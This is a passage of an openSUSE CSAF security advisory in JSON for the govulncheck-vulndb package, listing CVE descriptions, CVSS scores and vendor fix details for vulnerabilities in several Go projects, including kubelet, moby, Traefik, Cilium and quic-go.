{
"category": "self",
"summary": "SUSE CVE CVE-2024-50948 page",
"url": "https://www.suse.com/security/cve/CVE-2024-50948/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-52003 page",
"url": "https://www.suse.com/security/cve/CVE-2024-52003/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-52529 page",
"url": "https://www.suse.com/security/cve/CVE-2024-52529/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-52801 page",
"url": "https://www.suse.com/security/cve/CVE-2024-52801/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-53259 page",
"url": "https://www.suse.com/security/cve/CVE-2024-53259/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-53264 page",
"url": "https://www.suse.com/security/cve/CVE-2024-53264/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-53858 page",
"url": "https://www.suse.com/security/cve/CVE-2024-53858/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-53862 page",
"url": "https://www.suse.com/security/cve/CVE-2024-53862/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-54131 page",
"url": "https://www.suse.com/security/cve/CVE-2024-54131/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-54132 page",
"url": "https://www.suse.com/security/cve/CVE-2024-54132/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-6156 page",
"url": "https://www.suse.com/security/cve/CVE-2024-6156/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-6219 page",
"url": "https://www.suse.com/security/cve/CVE-2024-6219/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-6538 page",
"url": "https://www.suse.com/security/cve/CVE-2024-6538/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-8676 page",
"url": "https://www.suse.com/security/cve/CVE-2024-8676/"
}
],
"title": "govulncheck-vulndb-0.0.20241209T183251-1.1 on GA media",
"tracking": {
"current_release_date": "2024-12-11T00:00:00Z",
"generator": {
"date": "2024-12-11T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2024:14567-1",
"initial_release_date": "2024-12-11T00:00:00Z",
"revision_history": [
{
"date": "2024-12-11T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"product": {
"name": "govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"product_id": "govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"product": {
"name": "govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"product_id": "govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"product": {
"name": "govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"product_id": "govulncheck-vulndb-0.0.20241209T183251-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64",
"product": {
"name": "govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64",
"product_id": "govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64"
},
"product_reference": "govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le"
},
"product_reference": "govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20241209T183251-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x"
},
"product_reference": "govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
},
"product_reference": "govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-10220",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-10220"
}
],
"notes": [
{
"category": "general",
"text": "The Kubernetes kubelet component allows arbitrary command execution via specially crafted gitRepo volumes. This issue affects kubelet: through 1.28.11, from 1.29.0 through 1.29.6, from 1.30.0 through 1.30.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-10220",
"url": "https://www.suse.com/security/cve/CVE-2024-10220"
},
{
"category": "external",
"summary": "SUSE Bug 1233583 for CVE-2024-10220",
"url": "https://bugzilla.suse.com/1233583"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2024-10220"
},
{
"cve": "CVE-2024-36620",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-36620"
}
],
"notes": [
{
"category": "general",
"text": "moby v25.0.0 - v26.0.2 is vulnerable to NULL Pointer Dereference via daemon/images/image_history.go.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-36620",
"url": "https://www.suse.com/security/cve/CVE-2024-36620"
},
{
"category": "external",
"summary": "SUSE Bug 1234127 for CVE-2024-36620",
"url": "https://bugzilla.suse.com/1234127"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-36620"
},
{
"cve": "CVE-2024-36621",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-36621"
}
],
"notes": [
{
"category": "general",
"text": "moby v25.0.5 is affected by a Race Condition in builder/builder-next/adapters/snapshot/layer.go. The vulnerability could be used to trigger concurrent builds that call the EnsureLayer function resulting in resource leaks/exhaustion.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-36621",
"url": "https://www.suse.com/security/cve/CVE-2024-36621"
},
{
"category": "external",
"summary": "SUSE Bug 1234131 for CVE-2024-36621",
"url": "https://bugzilla.suse.com/1234131"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-36621"
},
{
"cve": "CVE-2024-36623",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-36623"
}
],
"notes": [
{
"category": "general",
"text": "moby through v25.0.3 has a Race Condition vulnerability in the streamformatter package which can be used to trigger multiple concurrent write operations resulting in data corruption or application crashes.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-36623",
"url": "https://www.suse.com/security/cve/CVE-2024-36623"
},
{
"category": "external",
"summary": "SUSE Bug 1234132 for CVE-2024-36623",
"url": "https://bugzilla.suse.com/1234132"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2024-36623"
},
{
"cve": "CVE-2024-37820",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-37820"
}
],
"notes": [
{
"category": "general",
"text": "A nil pointer dereference in PingCAP TiDB v8.2.0-alpha-216-gfe5858b allows attackers to crash the application via expression.inferCollation.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-37820",
"url": "https://www.suse.com/security/cve/CVE-2024-37820"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-37820"
},
{
"cve": "CVE-2024-43784",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-43784"
}
],
"notes": [
{
"category": "general",
"text": "lakeFS is an open-source tool that transforms object storage into a Git-like repository. Existing lakeFS users who have issued credentials to users who have been deleted are affected by this vulnerability. When creating a new user with the same username as a deleted user, that user will inherit all of the previous user\u0027s credentials. This issue has been addressed in release version 1.33.0 and all users are advised to upgrade. The only known workaround for those who cannot upgrade is to not reuse usernames.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-43784",
"url": "https://www.suse.com/security/cve/CVE-2024-43784"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-43784"
},
{
"cve": "CVE-2024-45719",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-45719"
}
],
"notes": [
{
"category": "general",
"text": "Inadequate Encryption Strength vulnerability in Apache Answer.\n\nThis issue affects Apache Answer: through 1.4.0.\n\nIdentifiers generated with UUID version 1 are not sufficiently unpredictable, so tokens derived from them can be guessed by an attacker.\nUsers are recommended to upgrade to version 1.4.1, which fixes the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-45719",
"url": "https://www.suse.com/security/cve/CVE-2024-45719"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "low"
}
],
"title": "CVE-2024-45719"
},
{
"cve": "CVE-2024-50948",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-50948"
}
],
"notes": [
{
"category": "general",
"text": "An issue in mochiMQTT v2.6.3 allows attackers to cause a Denial of Service (DoS) via a crafted request.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-50948",
"url": "https://www.suse.com/security/cve/CVE-2024-50948"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2024-50948"
},
{
"cve": "CVE-2024-52003",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-52003"
}
],
"notes": [
{
"category": "general",
"text": "Traefik (pronounced traffic) is an HTTP reverse proxy and load balancer. There is a vulnerability in Traefik that allows the client to provide the X-Forwarded-Prefix header from an untrusted source. This issue has been addressed in versions 2.11.14 and 3.2.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-52003",
"url": "https://www.suse.com/security/cve/CVE-2024-52003"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-52003"
},
{
"cve": "CVE-2024-52529",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-52529"
}
],
"notes": [
{
"category": "general",
"text": "Cilium is a networking, observability, and security solution with an eBPF-based dataplane. For users with the following configuration: 1. An allow policy that selects a Layer 3 destination and a port range `AND` 2. A Layer 7 allow policy that selects a specific port within the first policy\u0027s range the Layer 7 enforcement would not occur for the traffic selected by the Layer 7 policy. This issue only affects users who use Cilium\u0027s port range functionality, which was introduced in Cilium v1.16. This issue is patched in PR #35150. This issue affects Cilium v1.16 between v1.16.0 and v1.16.3 inclusive. This issue is patched in Cilium v1.16.4. Users are advised to upgrade. Users with network policies that match the pattern described above can work around the issue by rewriting any policies that use port ranges to individually specify the ports permitted for traffic.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-52529",
"url": "https://www.suse.com/security/cve/CVE-2024-52529"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-52529"
},
{
"cve": "CVE-2024-52801",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-52801"
}
],
"notes": [
{
"category": "general",
"text": "sftpgo is a full-featured and highly configurable event-driven file transfer solution. Server protocols: SFTP, HTTP/S, FTP/S, WebDAV. The OpenID Connect implementation allows authenticated users to brute force session cookies and thereby gain access to other users\u0027 data, since the cookies are generated predictably using the xid library and are therefore unique but not cryptographically secure. This issue was fixed in version v2.6.4, where cookies are opaque and cryptographically secure strings. All users are advised to upgrade. There are no known workarounds for this vulnerability.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-52801",
"url": "https://www.suse.com/security/cve/CVE-2024-52801"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-52801"
},
{
"cve": "CVE-2024-53259",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-53259"
}
],
"notes": [
{
"category": "general",
"text": "quic-go is an implementation of the QUIC protocol in Go. An off-path attacker can inject an ICMP Packet Too Large packet. Since affected quic-go versions used IP_PMTUDISC_DO, the kernel would then return a \"message too large\" error on sendmsg, i.e. when quic-go attempts to send a packet that exceeds the MTU claimed in that ICMP packet. By setting this value to smaller than 1200 bytes (the minimum MTU for QUIC), the attacker can disrupt a QUIC connection. Crucially, this can be done after completion of the handshake, thereby circumventing any TCP fallback that might be implemented on the application layer (for example, many browsers fall back to HTTP over TCP if they\u0027re unable to establish a QUIC connection). The attacker needs to at least know the client\u0027s IP and port tuple to mount an attack. This vulnerability is fixed in 0.48.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-53259",
"url": "https://www.suse.com/security/cve/CVE-2024-53259"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-53259"
},
{
"cve": "CVE-2024-53264",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-53264"
}
],
"notes": [
{
"category": "general",
"text": "bunkerweb is an open-source and next-generation Web Application Firewall (WAF). An open redirect vulnerability exists in the loading endpoint, allowing attackers to redirect authenticated users to arbitrary external URLs via the \"next\" parameter. The loading endpoint accepts and uses an unvalidated \"next\" parameter for redirects. For example, visiting `/loading?next=https://google.com` while authenticated will cause the page to redirect to google.com. This vulnerability could be used in phishing attacks by redirecting users from a legitimate application URL to malicious sites. This issue has been addressed in version 1.5.11. Users are advised to upgrade. There are no known workarounds for this vulnerability.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-53264",
"url": "https://www.suse.com/security/cve/CVE-2024-53264"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
